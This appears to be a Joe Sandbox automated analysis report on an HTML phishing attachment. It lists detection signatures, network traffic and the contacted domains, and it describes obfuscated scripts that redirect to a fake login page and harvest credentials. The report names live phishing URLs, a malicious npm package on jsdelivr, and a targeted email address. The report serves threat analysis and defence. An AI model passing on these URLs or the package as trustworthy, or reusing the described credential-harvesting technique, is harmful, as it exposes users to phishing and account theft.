Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A_C_H_JAN14.htm

Overview

General Information

Sample name:A_C_H_JAN14.htm
Analysis ID:1592194
MD5:1df9751c6e80d2f2a9fa3c926e118317
SHA1:e89c7c6e532e82d7bf2d1471a061a9b29258819e
SHA256:916859eff63990aa5fe16534bf4fbab689af37db673be426289f6bfdba68abc7

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
AI detected suspicious URL
HTML Script injector detected
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code

Classification

  • System is w11x64_office
  • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\A_C_H_JAN14.htm MD5: 290DF23002E9B52249B5549F0C668A86)
    • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1908,i,6903188666539983047,13372110593391112098,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2224 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMEN... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script fetches data from a potentially suspicious domain and then opens a new window with a URL that includes encoded parameters. This behavior is highly suspicious and indicates a potential phishing or malicious activity.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to redirect the user to a suspicious domain and collects user credentials via XHR requests. While the script may have some legitimate functionality, the overall behavior is highly suspicious and poses a significant security risk.
Source: 0.8.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It appears to be a malicious script designed to steal user credentials and redirect users to a fake login page.
Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of phishing or other malicious activities.
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://pending-revew.pages.dev
Source: file:///C:/Users/user/Desktop/A_C_H_JAN14.htmHTTP Parser: New script, src: https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS
Source: A_C_H_JAN14.htmHTTP Parser: Base64 decoded: fwilliams@liftone.net
Source: A_C_H_JAN14.htmHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/A_C_H_JAN14.htmHTTP Parser: No favicon
Source: https://pending-revew.pages.dev/#?service=Wm5kcGJHeHBZVzF6UUd4cFpuUnZibVV1Ym1WMCZtaW5kZWQmYQ==HTTP Parser: No favicon
Source: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.netHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.24:63836 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.24:63839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63874 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63878 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63879 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 6MB later: 36MB
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: max-age = 3600Connection: Keep-AliveAccept: */*If-Modified-Since: Mon, 12 Feb 2024 22:07:27 GMTIf-None-Match: "65ca969f-2cd"User-Agent: Microsoft-CryptoAPI/10.0Host: x1.c.lencr.org
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: natrium100gram.site
Source: global trafficDNS traffic detected: DNS query: pending-revew.pages.dev
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: topimo.trilidarn.ru
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 63835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63880
Source: unknownNetwork traffic detected: HTTP traffic on port 63861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63818
Source: unknownNetwork traffic detected: HTTP traffic on port 63849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 63837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63828
Source: unknownNetwork traffic detected: HTTP traffic on port 63879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
Source: unknownNetwork traffic detected: HTTP traffic on port 63863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63839
Source: unknownNetwork traffic detected: HTTP traffic on port 63874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63831
Source: unknownNetwork traffic detected: HTTP traffic on port 63860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63848
Source: unknownNetwork traffic detected: HTTP traffic on port 63854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63842
Source: unknownNetwork traffic detected: HTTP traffic on port 63834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63857
Source: unknownNetwork traffic detected: HTTP traffic on port 63828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63859
Source: unknownNetwork traffic detected: HTTP traffic on port 63872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63853
Source: unknownNetwork traffic detected: HTTP traffic on port 63862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63864
Source: unknownNetwork traffic detected: HTTP traffic on port 63836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63879
Source: unknownNetwork traffic detected: HTTP traffic on port 63853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63872
Source: unknownNetwork traffic detected: HTTP traffic on port 63878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63875
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.24:63836 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.24:63839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63874 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63878 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.24:63879 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6448_313927333
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6448_313927333
Source: classification engineClassification label: mal60.phis.evad.winHTM@18/13@36/209
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\A_C_H_JAN14.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1908,i,6903188666539983047,13372110593391112098,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2224 /prefetch:11
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1908,i,6903188666539983047,13372110593391112098,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2224 /prefetch:11
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.netHTTP Parser: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.net
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/A_C_H_JAN14.htm0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.193.229
truefalse
    high
    topimo.trilidarn.ru
    172.67.141.195
    truetrue
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        pending-revew.pages.dev
        172.66.47.105
        truefalse
          high
          code.jquery.com
          151.101.130.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                www.google.com
                216.58.206.36
                truefalse
                  high
                  natrium100gram.site
                  194.163.42.36
                  truefalse
                    high
                    cdn.jsdelivr.net
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://pending-revew.pages.dev/#?service=Wm5kcGJHeHBZVzF6UUd4cFpuUnZibVV1Ym1WMCZtaW5kZWQmYQ==false
                        unknown
                        https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@liftone.nettrue
                          unknown
                          file:///C:/Users/user/Desktop/A_C_H_JAN14.htmtrue
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.110.84
                          unknownUnited States
                          15169GOOGLEUSfalse
                          1.1.1.1
                          unknownAustralia
                          13335CLOUDFLARENETUSfalse
                          194.163.42.36
                          natrium100gram.siteGermany
                          6659NEXINTO-DEfalse
                          172.67.141.195
                          topimo.trilidarn.ruUnited States
                          13335CLOUDFLARENETUStrue
                          104.18.187.31
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          151.101.193.229
                          jsdelivr.map.fastly.netUnited States
                          54113FASTLYUSfalse
                          142.250.186.163
                          unknownUnited States
                          15169GOOGLEUSfalse
                          104.18.94.41
                          challenges.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          216.58.206.67
                          unknownUnited States
                          15169GOOGLEUSfalse
                          216.58.206.36
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          151.101.130.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          216.58.206.46
                          unknownUnited States
                          15169GOOGLEUSfalse
                          172.66.47.105
                          pending-revew.pages.devUnited States
                          13335CLOUDFLARENETUSfalse
                          142.250.185.142
                          unknownUnited States
                          15169GOOGLEUSfalse
                          151.101.66.137
                          unknownUnited States
                          54113FASTLYUSfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          172.66.44.151
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          104.17.25.14
                          cdnjs.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          142.250.184.234
                          unknownUnited States
                          15169GOOGLEUSfalse
                          IP
                          192.168.2.4
                          192.168.2.24
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1592194
                          Start date and time:2025-01-15 22:23:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                          Run name:Potential for more IOCs and behavior
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:A_C_H_JAN14.htm
                          Detection:MAL
                          Classification:mal60.phis.evad.winHTM@18/13@36/209
                          Cookbook Comments:
                          • Found application associated with file extension: .htm
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded IPs from analysis (whitelisted): 172.64.149.23, 104.18.38.233
                          • Excluded domains from analysis (whitelisted): crt.comodoca.com.cdn.cloudflare.net, crt.comodoca.com
                          • Not all processes where analyzed, report is missing behavior information
                          • VT rate limit hit for: topimo.trilidarn.ru
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1687
                          Entropy (8bit):7.878251008693767
                          Encrypted:false
                          SSDEEP:
                          MD5:53613BE6D4D81D848D3485498C8E7317
                          SHA1:DA205EE931DB854E52AE75A3A9C3D24428E834A6
                          SHA-256:A25EB29322D361B9C84C9CA92490C9F947DBCDF1D77C0B6F8DAE518EE51D25B8
                          SHA-512:55A54C1B2A884F03EC3E62E6C693A471D22D592762BBFCAB4F12EBAB4FE9C7488AF1EDC9113DB7EA0B5EA7224BDE8F0E6EEE1D4EE04D4382823DBC72735C6E46
                          Malicious:false
                          Reputation:unknown
                          Preview:.............M.<V..tN.b...X.Y#..H.MB+vz........v.t.EP.*...DNT..w-..*...iZ.9.#:#..t:....9...B....3....z...5.U...$.Y.E........f.F.1.$,.....\.#..6..s.{.Y..7...`.6J....>..ZW.G..G.9.....+.X.....^F.j.....]y.{[z&.......K..9...P...Fj.....9..N.......d.NA..:..;..CU...../wn}B..Q^u{.I....8"yL.m.?.{....!..T.k..x.9...:.OZ.O.o..L.r^KN.A...9..w..f...n@#....$D..../...W"]m....F..+d.q...[d;.o[.Sr...y....1.x4.q....0.Z..@A.W$h....wk..)E,.x...J.+U....!....f.P...C......;...@.!.95t*.nE.[=.l..T.,w.v.w$........l........=/.j..K.;...g.R}...g...rH.iJ.5.rps.-......Pd?....9...).....U........]R.a.[.N2...V{..O.W........f.....4tq;?.....D.;.....-f.%......,#8..,7.....N._r....q..)..;...M\.tz.w...x..<..Yz.^,..............XUs....0.}.x.b.-...0c.y.}<....$..Y...s.H..8.S..Mu.VI......:.".pNk."k.&..]........<......Vx.... a..wi.f..]bk.N.|l.2.w..#+...2.,....2.%,...e$(...z........_[..'w@.@..+.....n..#....s..g..=?.%..x(V.......~..U..i.2gX.......].5.,.yj.....m....z.....[9...S.'.~...x;
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:dropped
                          Size (bytes):87533
                          Entropy (8bit):5.262536918435756
                          Encrypted:false
                          SSDEEP:
                          MD5:2C872DBE60F4BA70FB85356113D8B35E
                          SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                          SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                          SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                          Malicious:false
                          Reputation:unknown
                          Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):2009
                          Entropy (8bit):3.780989940549515
                          Encrypted:false
                          SSDEEP:
                          MD5:6DAA3DA7A00F06D4351BFFDF661D65BF
                          SHA1:E7BCA33A46438D9833FF96A614A990CA90BB3DCE
                          SHA-256:35FF658910C0DA186EF710711AA1C774756BC6E2855D7783BB2FF0A36EDF0308
                          SHA-512:BCB3875FF729A94DD7DA3C0D90760FE59FDCBF9657938E599DF552F10313BB61104535275C4266BBE8A1E8D9AB79DB0E3D118856A2FAD62A92617F950EF7E626
                          Malicious:false
                          Reputation:unknown
